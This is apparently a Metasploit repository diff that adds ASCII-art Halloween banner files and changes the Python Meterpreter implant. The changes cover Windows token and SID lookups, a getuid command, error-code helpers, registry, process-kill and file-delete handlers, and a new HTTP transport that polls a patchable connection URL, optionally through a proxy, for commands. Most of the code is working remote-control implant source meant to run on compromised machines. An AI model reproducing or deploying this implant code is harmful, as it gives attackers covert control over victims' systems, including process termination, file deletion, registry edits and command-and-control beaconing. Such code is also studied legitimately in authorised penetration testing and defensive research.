,mmmmm, ______ _________
@ooooo@, / /. . \\ /./-----\.\
@0m0m0Q@ / /. . .`,\\>./, , ,\.\
@0X00X@@ | |. . . |:|\| , , |.|
____@0m00@_____ | | . . . |:|X| , , , |.|
@@@op(oboy)pop@@Ok | |. . . |:|\| , , |.|
@@@@opopopopop@@@p@@| | . . . |:|\| , , , |.|
@@o@@opopopopop@@op@@,|. . . |:|\| , , |.|
@@o@@popopopopopop@o@@| . . . |:|X| , , , |.|
@@o@@mmmmmmgogogo@oo@|. . . |:|\| , , |.|
@@@@@@@mmm'ooo@|@oo@| . . . |:|\| , , , |.|
@oooooooOOOO@" @o@|. . . |:|\| , , |.|
@OoOoO@OoOoO@ @@@| . . . |:|X| , , , |.|
@oooo@@@oooo@ @@@|. . . .|:|\| , , |.|
.@@@o@@@@ooo@@ ,@@}| . . .// \\_________/.|
.@@oo@@@@@@ooo@. "@@'|. . // \==========/
.@ooooo@@@@@oooo@ \ //
@ooooO@' `@@ooo@|
@oooo@' `@oooo@
@ooo@' `oooo@| The MUMMY, from his coffin,
@oo@@' `@oo@| began to rise. And suddenly,
@o@@| @@o@, to my surprize!
@@@@: @@o@| -----
@@@@: @@o@| "HE DID THE MASH!"
`@oo: `@@@:
/@@@) /@@@)
(@@@@/ (@@@@/ \_/ Phoenix... (lives)

View File

@ -0,0 +1,22 @@
.....
.d$$$$*$$$$$$bc
.d$P" d$$ "*$$.
d$" 4$"$$ "$$.
4$P $F ^$F "$c
z$% d$ 3$ ^$L
4$$$$$$$$$$$$$$$$$$$$$$$$$$$$$F
$$$F"""""""$F""""""$F"""""C$$*$
.$%"$$e d$ 3$ z$$" $F
4$ *$$.4$" $$d$P" $$
4$ ^*$$. .d$F $$
4$ d$"$$c z$$"3$ $F
$L 4$" ^*$$$P" $$ 4$"
3$ $F .d$P$$e ^$F $P
$$ d$ .$$" "$$c 3$ d$
*$.4$"z$$" ^*$$$$ $$
"$$$$P" "$$$P
*$b. .d$P"
"$$$ec.....ze$$$"
"**$$$**""

View File

@ -0,0 +1,28 @@
ooo
$ o$
o $$
""$$$ o" $$ oo "
" o$"$oo$$$"o$$o$$"$$$$$ o
$" "o$$$$$$o$$$$$$$$$$$$$$o o
o$" "$$$$$$$$$$$$$$$$$$$$$$o" "oo o
" " o "$$$o o$$$$$$$$$$$oo$$
" $ " "o$$$$$ $$$$$$$$$$$"$$$$$$$o
o $ o o$$$$$"$$$$$$$$$$$o$$"""$$$$o " "
o o$$$$$" "$$$$$$$$$$ "" oo $$ o $
$ $ $$$$$ $$$oo "$$$$$$$$o o $$$o$$oo o o
o o $$$$$oo$$$$$$o$$$$ ""$$oo$$$$$$$$" " "o
" o $ ""$$$$$$$$$$$$$$ o "$$$$$$$$$$$$ o "
" $ "$$$$$$$$$$$$$$ " $$$"$$$$$$$$o o
$ o o$"""""$$$$$$$$ oooo$$ $$$$$$$$" "
$ o""o $$o $$$$$$$$$$$$$$$$$ "" o$$$ $ o
o " "o "$$$$ $$$$$""""""""""" $ o$$$$$"" o o
" " o o$o" $$$$o "" o o$$$$$" o
$ o$$$$$$$oo "oo$$$$$$$" o
"$ o o$o $o o$$$$$"$$$$oooo$$$$$$$$$$$$$$"o$o
"o oo $o$"oo$$$$$o$$$$$$$$$$$$"$$$$$$$$"o$"
"$ooo $$o$ $$$$$$$$$$$$$$$$ $$$$$$$$o"
"" $$$$$$$$$$$$$$$$$$$$$$" """"
""""""

View File

@ -0,0 +1,25 @@
........
;::;;::;,
;::;;::;;,
;;:::;;::;;,
.vnmmnv%vnmnv%,.;;;:::;;::;;, .,vnmnv%vnmnv,
vnmmmnv%vnmmmnv%vnmmnv%;;;;;;;%nmmmnv%vnmmnv%vnmmnv
vnmmnv%vnmmmmmnv%vnmmmmmnv%;:;%nmmmmmmnv%vnmmmnv%vnmmmnv
vnmmnv%vnmmmmmnv%vnmmmmmmmmnv%vnmmmmmmmmnv%vnmmmnv%vnmmmnv
vnmmnv%vnmmmmmnv%vnmmmmmmmmnv%vnmmmmmmmmmmnv%vnmmmnv%vnmmmnv
vnmmnv%vnmmmmmnv%vnmm;mmmmmmnv%vnmmmmmmmm;mmnv%vnmmmnv%vnmmmnv,
vnmmnv%vnmmmmmnv%vnmm;' mmmmmnv%vnmmmmmmm;' mmnv%vnmmmnv%vnmmmnv
vnmmnv%vnmmmmmnv%vn;; mmmmnv%vnmmmmmm;; nv%vnmmmmnv%vnmmmnv
vnmmnv%vnmmmmmmnv%v;; mmmnv%vnmmmmm;; v%vnmmmmmnv%vnmmmnv
vnmmnv%vnmmmmmmnv%vnmmmmmmmmm;; mmmmmmmmmnv%vnmmmmmmnv%vnmmmnv
vnmmnv%vnmmmmmmnv%vnmmmmmmmmmm;; mmmmmmmmmmnv%vnmmmmmmnv%vnmmmnv
vnmmnv%vnmmmmm nv%vnmmmmmmmmmmnv;, mmmmmmmmmmmmnv%vn;mmmmmnv%vnmmmnv
vnmmnv%vnmmmmm nv%vnmmmmmmmmmnv%;nmmmmmmmmmmmnv%vn; mmmmmnv%vnmmmnv
`vnmmnv%vnmmmm, v%vnmmmmmmmmmmnv%vnmmmmmmmmmmnv%v; mmmmnv%vnnmmnv'
vnmmnv%vnmmmm;, %vnmmmmmmmmmnv%vnmmmmmmmmmnv%;' mmmnv%vnmmmmnv
vnmmnv%vnmmmm;;, nmmm;' mmmm;;' mmmnv%vnmmmmnv'
`vnmmnv%vnmmmmm;;,. mmnv%v;, mmmmnv%vnmmmmnv'
`vnmmnv%vnmmmmmmnv%vnmmmmmmmmnv%vnmmmmmmnv%vnmmmmmnv%vnmmmmnv'
`vnmvn%vnmmmmmmnv%vnmmmmmmmnv%vnmmmmmnv%vnmmmmmnv%vnmmmnv'
`vn%vnmmmmmmn%:%vnmnmmmmnv%vnmmmnv%:%vnmmnv%vnmnv'

View File

@ -0,0 +1,25 @@
@@@
@@@
@@@
@@@
@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@ @@@@@@@@@@@@@@@@ @@@@@@@@
@@@@@@@@@ @@@@@@@@@@@@@@ @@@@@@@@@
@@@@@@@@@@ @@@@@@@@@@@@ @@@@@@@@@@
@@@@@@@@@@ @@@@ @@@@ @@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@
@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @ @@@@@@@@
@@@@@@@ @@@@@@@
@@@@@@ @@ @@ @@ @@ @@ @@ @ @@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@

View File

@ -0,0 +1,20 @@
__
| |
| |
___/____\___
_- ~ ~ _
- ~ ~ -_
- _
- /\ /\ _
- / *\ / *\ _
_ /____\ /____\ _
_ /\ _
_ /__\ _
_ |\ /| _
- \ `\/\/\/\/\/\/\/\/\/\/' / _
- \ / -
~ `\/^\/^\/^\/^\/^\/^\/' ~
~ -~
`--_._._._._._._._._._.._--'

35
data/logos/tricks01.hwtxt Normal file
View File

@ -0,0 +1,35 @@
_...----.
.' .-'`
,''--..;
/ |
_______/________|_______
`-----/// _\ /_ \\\-----`
.---./ / o\/o \ \.---.
<(_ /// \__/\__/ \\\ _)> _.---.
'-. // oo \\ .-' .' .__`\
o /// __..--..__ \\\ / \`\|
o-'*'-o //| '\/\/\/\/' |\\ / ; '
\*\|/*/ ;--. """" .-; | _ _ |
.-'---'-. / \|||-....(|||`\ | (o) (o) |
/ \ /\ /\|/ |
| .---, |/ \ / ; ' |
| / e e \ | '. .' | '-. \
\| ^ |/ '---' | \_
()._-_.() T R I C K | .._.----/` \
,/\'._.'/\. ' . | / ``"-/||\ \
/ \/ \/ \ O R | | `7,
| ^^_____^^ | | . /// _ |
|oOO` `OOo| T R E A T ; |' / |_) _ |
\| '._____.' |/ / \-| |_)/ \ _ |
|:: | '.__ __,; `| \_// \ |
|:: | ````` | | \_/ ;
|:: | | \ /
\::. /_____________| ``'--..___/
'._______.' '-| | |-' |
|_ | _| | | | __.-;
\ | / /-._|_.-\ \
\_|_/ /`'-.|.-'`\ /
jgs /--T--\ / .'. \'-..____.---''''``
(__/ \__) \____/ \___/

View File

@ -60,9 +60,13 @@ if sys.version_info[0] < 3:
bytes = lambda *args: str(*args[:1]) bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00' NULL_BYTE = '\x00'
else: else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str']) if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, 'UTF-8')
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, 'UTF-8')
is_bytes = lambda obj: issubclass(obj.__class__, bytes) is_bytes = lambda obj: issubclass(obj.__class__, bytes)
str = lambda x: __builtins__['str'](x, 'UTF-8')
NULL_BYTE = bytes('\x00', 'UTF-8') NULL_BYTE = bytes('\x00', 'UTF-8')
long = int long = int
@ -215,6 +219,9 @@ if has_ctypes:
("wProcessorLevel", ctypes.c_uint16), ("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16)] ("wProcessorRevision", ctypes.c_uint16)]
class TOKEN_USER(ctypes.Structure):
_fields_ = [("User", SID_AND_ATTRIBUTES)]
# #
# Linux Structures # Linux Structures
# #
@ -364,6 +371,7 @@ TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041 TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042 TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043 TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
TLV_TYPE_SID = TLV_META_TYPE_STRING | 1045
## ##
# Environment # Environment
@ -497,6 +505,8 @@ IFLA_MTU = 4
IFA_ADDRESS = 1 IFA_ADDRESS = 1
IFA_LABEL = 3 IFA_LABEL = 3
meterpreter.register_extension('stdapi')
def calculate_32bit_netmask(bits): def calculate_32bit_netmask(bits):
if bits == 32: if bits == 32:
return 0xffffffff return 0xffffffff
@ -525,6 +535,36 @@ def get_stat_buffer(path):
st_buf += struct.pack('<II', blksize, blocks) st_buf += struct.pack('<II', blksize, blocks)
return st_buf return st_buf
def get_token_user(handle):
TOKEN_QUERY = 0x0008
TokenUser = 1
advapi32 = ctypes.windll.advapi32
advapi32.OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
token_handle = ctypes.c_void_p()
if not advapi32.OpenProcessToken(handle, TOKEN_QUERY, ctypes.byref(token_handle)):
return None
token_user_buffer = (ctypes.c_byte * 4096)()
dw_returned = ctypes.c_uint32()
result = advapi32.GetTokenInformation(token_handle, TokenUser, ctypes.byref(token_user_buffer), ctypes.sizeof(token_user_buffer), ctypes.byref(dw_returned))
ctypes.windll.kernel32.CloseHandle(token_handle)
if not result:
return None
return cstruct_unpack(TOKEN_USER, token_user_buffer)
def get_username_from_token(token_user):
user = (ctypes.c_char * 512)()
domain = (ctypes.c_char * 512)()
user_len = ctypes.c_uint32()
user_len.value = ctypes.sizeof(user)
domain_len = ctypes.c_uint32()
domain_len.value = ctypes.sizeof(domain)
use = ctypes.c_ulong()
use.value = 0
if not ctypes.windll.advapi32.LookupAccountSidA(None, token_user.User.Sid, user, ctypes.byref(user_len), domain, ctypes.byref(domain_len), ctypes.byref(use)):
return None
return str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(user))
def netlink_request(req_type): def netlink_request(req_type):
import select import select
# See RFC 3549 # See RFC 3549
@ -632,16 +672,13 @@ def channel_open_stdapi_net_tcp_server(request, response):
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getuid(request, response):
response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
def stdapi_sys_config_getenv(request, response): def stdapi_sys_config_getenv(request, response):
for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE): for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
pgroup = '' pgroup = bytes()
env_var = env_var['value'].translate(None, '%$') env_var = env_var['value']
env_var = env_var.replace('%', '')
env_var = env_var.replace('$', '')
env_val = os.environ.get(env_var) env_val = os.environ.get(env_var)
if env_val: if env_val:
pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var) pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
@ -649,6 +686,34 @@ def stdapi_sys_config_getenv(request, response):
response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup) response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_sys_config_getsid(request, response):
token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
if not token:
return error_result_windows(), response
sid_str = ctypes.c_char_p()
if not ctypes.windll.advapi32.ConvertSidToStringSidA(token.User.Sid, ctypes.byref(sid_str)):
return error_result_windows(), response
sid_str = str(ctypes.string_at(sid_str))
response += tlv_pack(TLV_TYPE_SID, sid_str)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getuid(request, response):
if has_pwd:
username = pwd.getpwuid(os.getuid()).pw_name
elif has_windll:
token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
if not token:
return error_result_windows(), response
username = get_username_from_token(token)
if not username:
return error_result_windows(), response
else:
username = getpass.getuser()
response += tlv_pack(TLV_TYPE_USER_NAME, username)
return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
def stdapi_sys_config_sysinfo(request, response): def stdapi_sys_config_sysinfo(request, response):
uname_info = platform.uname() uname_info = platform.uname()
@ -731,9 +796,9 @@ def stdapi_sys_process_kill(request, response):
k32 = ctypes.windll.kernel32 k32 = ctypes.windll.kernel32
proc_h = k32.OpenProcess(PROCESS_TERMINATE, False, pid) proc_h = k32.OpenProcess(PROCESS_TERMINATE, False, pid)
if not proc_h: if not proc_h:
return ERROR_FAILURE, response return error_result_windows(), response
if not k32.TerminateProcess(proc_h, 0): if not k32.TerminateProcess(proc_h, 0):
return ERROR_FAILURE, response return error_result_windows(), response
elif hasattr(os, 'kill'): elif hasattr(os, 'kill'):
os.kill(pid, 9) os.kill(pid, 9)
else: else:
@ -800,7 +865,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
proc_snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) proc_snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
result = k32.Process32First(proc_snap, ctypes.byref(pe32)) result = k32.Process32First(proc_snap, ctypes.byref(pe32))
if not result: if not result:
return ERROR_FAILURE, response return error_result_windows(), response
while result: while result:
proc_h = k32.OpenProcess((PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), False, pe32.th32ProcessID) proc_h = k32.OpenProcess((PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), False, pe32.th32ProcessID)
if not proc_h: if not proc_h:
@ -821,26 +886,10 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
exe_path = ctypes.string_at(exe_path) exe_path = ctypes.string_at(exe_path)
else: else:
exe_path = '' exe_path = ''
complete_username = '' process_username = ''
tkn_h = ctypes.c_long() process_token_user = get_token_user(proc_h)
tkn_len = ctypes.c_uint32() if process_token_user:
if ctypes.windll.advapi32.OpenProcessToken(proc_h, TOKEN_QUERY, ctypes.byref(tkn_h)): process_username = get_username_from_token(process_token_user) or ''
ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, None, 0, ctypes.byref(tkn_len))
buf = (ctypes.c_ubyte * tkn_len.value)()
if ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(tkn_len)):
user_tkn = SID_AND_ATTRIBUTES()
ctypes.memmove(ctypes.byref(user_tkn), buf, ctypes.sizeof(user_tkn))
username = (ctypes.c_char * 512)()
domain = (ctypes.c_char * 512)()
u_len = ctypes.c_uint32()
u_len.value = ctypes.sizeof(username)
d_len = ctypes.c_uint32()
d_len.value = ctypes.sizeof(domain)
use = ctypes.c_ulong()
use.value = 0
ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username))
k32.CloseHandle(tkn_h)
parch = windll_GetNativeSystemInfo() parch = windll_GetNativeSystemInfo()
is_wow64 = ctypes.c_ubyte() is_wow64 = ctypes.c_ubyte()
is_wow64.value = 0 is_wow64.value = 0
@ -851,7 +900,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
pgroup = bytes() pgroup = bytes()
pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID) pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username) pgroup += tlv_pack(TLV_TYPE_USER_NAME, process_username)
pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pe32.szExeFile) pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pe32.szExeFile)
pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, exe_path) pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, exe_path)
pgroup += tlv_pack(TLV_TYPE_PROCESS_ARCH, parch) pgroup += tlv_pack(TLV_TYPE_PROCESS_ARCH, parch)
@ -896,8 +945,7 @@ def stdapi_fs_delete_dir(request, response):
@meterpreter.register_function @meterpreter.register_function
def stdapi_fs_delete_file(request, response): def stdapi_fs_delete_file(request, response):
file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
if os.path.exists(file_path): os.unlink(file_path)
os.unlink(file_path)
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
@ -1299,10 +1347,10 @@ def stdapi_registry_create_key(request, response):
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
res_key = ctypes.c_void_p() res_key = ctypes.c_void_p()
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) != ERROR_SUCCESS:
response += tlv_pack(TLV_TYPE_HKEY, res_key.value) return error_result_windows(), response
return ERROR_SUCCESS, response response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
return ERROR_FAILURE, response return ERROR_SUCCESS, response
@meterpreter.register_function_windll @meterpreter.register_function_windll
def stdapi_registry_delete_key(request, response): def stdapi_registry_delete_key(request, response):
@ -1393,21 +1441,20 @@ def stdapi_registry_open_key(request, response):
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
handle_id = ctypes.c_void_p() handle_id = ctypes.c_void_p()
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS: if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) != ERROR_SUCCESS:
response += tlv_pack(TLV_TYPE_HKEY, handle_id.value) return error_result_windows(), response
return ERROR_SUCCESS, response response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
return ERROR_FAILURE, response return ERROR_SUCCESS, response
@meterpreter.register_function_windll @meterpreter.register_function_windll
def stdapi_registry_open_remote_key(request, response): def stdapi_registry_open_remote_key(request, response):
target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value'] target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value']
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
result_key = ctypes.c_void_p() result_key = ctypes.c_void_p()
result = ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key)) if ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key)) != ERROR_SUCCESS:
if (result == ERROR_SUCCESS): return error_result_windows(), response
response += tlv_pack(TLV_TYPE_HKEY, result_key.value) response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
return ERROR_FAILURE, response
@meterpreter.register_function_windll @meterpreter.register_function_windll
def stdapi_registry_query_class(request, response): def stdapi_registry_query_class(request, response):
@ -1415,11 +1462,10 @@ def stdapi_registry_query_class(request, response):
value_data = (ctypes.c_char * 4096)() value_data = (ctypes.c_char * 4096)()
value_data_sz = ctypes.c_uint32() value_data_sz = ctypes.c_uint32()
value_data_sz.value = ctypes.sizeof(value_data) value_data_sz.value = ctypes.sizeof(value_data)
result = ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None) if ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None) != ERROR_SUCCESS:
if result == ERROR_SUCCESS: return error_result_windows(), response
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data)) response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
return ERROR_FAILURE, response
@meterpreter.register_function_windll @meterpreter.register_function_windll
def stdapi_registry_query_value(request, response): def stdapi_registry_query_value(request, response):
@ -1447,7 +1493,7 @@ def stdapi_registry_query_value(request, response):
else: else:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value)) response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
return ERROR_FAILURE, response return error_result_windows(), response
@meterpreter.register_function_windll @meterpreter.register_function_windll
def stdapi_registry_set_value(request, response): def stdapi_registry_set_value(request, response):

View File

@ -18,19 +18,51 @@ except ImportError:
else: else:
has_windll = hasattr(ctypes, 'windll') has_windll = hasattr(ctypes, 'windll')
# this MUST be imported for urllib to work on OSX
try:
import SystemConfiguration as osxsc
has_osxsc = True
except ImportError:
has_osxsc = False
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3: if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str) is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1]) bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00' NULL_BYTE = '\x00'
else: else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, 'UTF-8')
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, 'UTF-8')
is_bytes = lambda obj: issubclass(obj.__class__, bytes) is_bytes = lambda obj: issubclass(obj.__class__, bytes)
str = lambda x: __builtins__['str'](x, 'UTF-8')
NULL_BYTE = bytes('\x00', 'UTF-8') NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
# #
# Constants # Constants
# #
# these values may be patched, DO NOT CHANGE THEM
DEBUGGING = False DEBUGGING = False
HTTP_COMMUNICATION_TIMEOUT = 300
HTTP_CONNECTION_URL = None
HTTP_EXPIRATION_TIMEOUT = 604800
HTTP_PROXY = None
HTTP_USER_AGENT = None
PACKET_TYPE_REQUEST = 0 PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1 PACKET_TYPE_RESPONSE = 1
@ -40,6 +72,8 @@ PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0 ERROR_SUCCESS = 0
# not defined in original C implementation # not defined in original C implementation
ERROR_FAILURE = 1 ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0 CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1 CHANNEL_CLASS_STREAM = 1
@ -124,6 +158,50 @@ def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz' chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32)) return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export @export
def inet_pton(family, address): def inet_pton(family, address):
if hasattr(socket, 'inet_pton'): if hasattr(socket, 'inet_pton'):
@ -284,15 +362,47 @@ class STDProcess(subprocess.Popen):
export(STDProcess) export(STDProcess)
class PythonMeterpreter(object): class PythonMeterpreter(object):
def __init__(self, socket): def __init__(self, socket=None):
self.socket = socket self.socket = socket
self.driver = None
self.running = False
self.communications_active = True
self.communications_last = 0
if self.socket:
self.driver = 'tcp'
elif HTTP_CONNECTION_URL:
self.driver = 'http'
self.last_registered_extension = None
self.extension_functions = {} self.extension_functions = {}
self.channels = {} self.channels = {}
self.interact_channels = [] self.interact_channels = []
self.processes = {} self.processes = {}
for func in list(filter(lambda x: x.startswith('_core'), dir(self))): for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func) self.extension_functions[func[1:]] = getattr(self, func)
self.running = True if self.driver:
if hasattr(self, 'driver_init_' + self.driver):
getattr(self, 'driver_init_' + self.driver)()
self.running = True
def debug_print(self, msg):
if DEBUGGING:
print(msg)
def driver_init_http(self):
if HTTP_PROXY:
proxy_handler = urllib.ProxyHandler({'http': HTTP_PROXY})
opener = urllib.build_opener(proxy_handler)
else:
opener = urllib.build_opener()
if HTTP_USER_AGENT:
opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
urllib.install_opener(opener)
self._http_last_seen = time.time()
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func): def register_function(self, func):
self.extension_functions[func.__name__] = func self.extension_functions[func.__name__] = func
@ -318,19 +428,73 @@ class PythonMeterpreter(object):
self.processes[idx] = process self.processes[idx] = process
return idx return idx
def get_packet(self):
packet = getattr(self, 'get_packet_' + self.driver)()
self.communications_last = time.time()
if packet:
self.communications_active = True
return packet
def send_packet(self, packet):
getattr(self, 'send_packet_' + self.driver)(packet)
self.communications_last = time.time()
self.communications_active = True
def get_packet_http(self):
packet = None
request = urllib.Request(HTTP_CONNECTION_URL, bytes('RECV', 'UTF-8'), self._http_request_headers)
try:
url_h = urllib.urlopen(request)
packet = url_h.read()
except:
if (time.time() - self._http_last_seen) > HTTP_COMMUNICATION_TIMEOUT:
self.running = False
else:
self._http_last_seen = time.time()
if packet:
packet = packet[8:]
else:
packet = None
return packet
